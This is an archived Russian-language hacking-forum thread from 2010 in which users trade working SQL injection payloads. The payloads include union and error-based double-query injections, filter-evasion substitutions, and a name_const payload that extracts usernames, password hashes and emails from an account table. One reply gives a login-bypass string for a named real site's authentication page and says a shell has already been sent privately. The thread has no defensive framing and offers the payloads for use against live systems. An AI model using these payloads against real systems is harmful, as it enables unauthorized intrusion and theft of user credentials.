ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.01.2010, 22:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от recfrf
Подскажите как быть при такой скуле
ордером кол-во полей показывает, при вводе
.php?id=5+union+select+1,2-- принт полей не выводит, если сменить id на произвольный например 999, то приписывает id к названию таблицы и выдает ошибку, например Table 'sjc5292.table_999' doesn't exist, куда копать?
5+and+1=2+union+select+...
5+or(1,2)=(select+count(*),concat(version(),floor( rand(0)*2))from(select+1+union+select+2+union+sele ct+3)a+group+by+2)--+
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
05.01.2010, 23:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от v1d0qz
Кто раскрутит дубли без символа * ?
Ты о чем?
|
|
|
|
06.01.2010, 12:34
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от ronald
Посмотри, может поможет чем-нибудь:
http://www.xakep.ru/post/50234/
спасибо то что надо
|
|
|
|
06.01.2010, 17:29
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от v1d0qz
Кто раскрутит дубли без символа * ?
Т.е. допустим запрос
or(1,1)=(select+count(*),concat(version(),floor(ra nd(0)*2))from+information_schema.tables+group+by+2 )--+
Нужно сделать без символа '*', потому как он обрезает запрос, ну или он фильтруется, т.е. результат один, с ним запрос не работает.
count(*) замени на count(0).
rand(0)*2 замени на rand(0)/(1/2).
|
|
|
|
06.01.2010, 18:58
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 1
Провел на форуме:
1626
Репутация:
0
|
|
как узнать платформу интернет ресурса?
|
|
|
|
06.01.2010, 19:20
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от aktlek
как узнать платформу интернет ресурса?
1) Найти phpinfo();
2) ошибка
3) ответ сервера
Крутой хакер-кодер писал для этого тулзу какую-ту 
|
|
|
|
06.01.2010, 23:37
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727
Репутация:
83
|
|
друзья, помогите пожалуйста, как можно заюзать SQL-иньекцию на данной странице авторизации http://pro-ilyichevsk.com/cms/!auth.php .
|
|
|
|
06.01.2010, 23:54
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от ronald
друзья, помогите пожалуйста, как можно заюзать SQL-иньекцию на данной странице авторизации http://pro-ilyichevsk.com/cms/!auth.php .
логин: ' or '1'='1
пароль: ' or '1'='1
P.S шелл в личку отправил
Последний раз редактировалось .:[melkiy]:.; 07.01.2010 в 00:03..
|
|
|
|
07.01.2010, 00:07
|
|
Новичок
Регистрация: 30.10.2009
Сообщений: 21
Провел на форуме:
182669
Репутация:
24
|
|
Код:
localhost/index.php?modul=char&id=1062197)+and+1=(select+*+from(select+*+from(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)d)+as+t+join+(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)e)b)a)--+
Чем можно заменить name_const ?
Код:
Notice: Incorrect arguments to NAME_CONST in /var/www/web3/web/modules/char.php on line 8
пишет |
|
|
|
07.01.2010, 00:09
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от KNR
Код:
localhost/index.php?modul=char&id=1062197)+and+1=(select+*+from(select+*+from(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)d)+as+t+join+(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)e)b)a)--+
Чем можно заменить name_const ?
Код:
Notice: Incorrect arguments to NAME_CONST in /var/www/web3/web/modules/char.php on line 8
пишет версия php?
UPD: http://bugs.mysql.com/bug.php?id=27545
Последний раз редактировалось .:[melkiy]:.; 07.01.2010 в 00:18..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1808129){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1808161){kind=avatar}
Похожие темы
Линейный вид
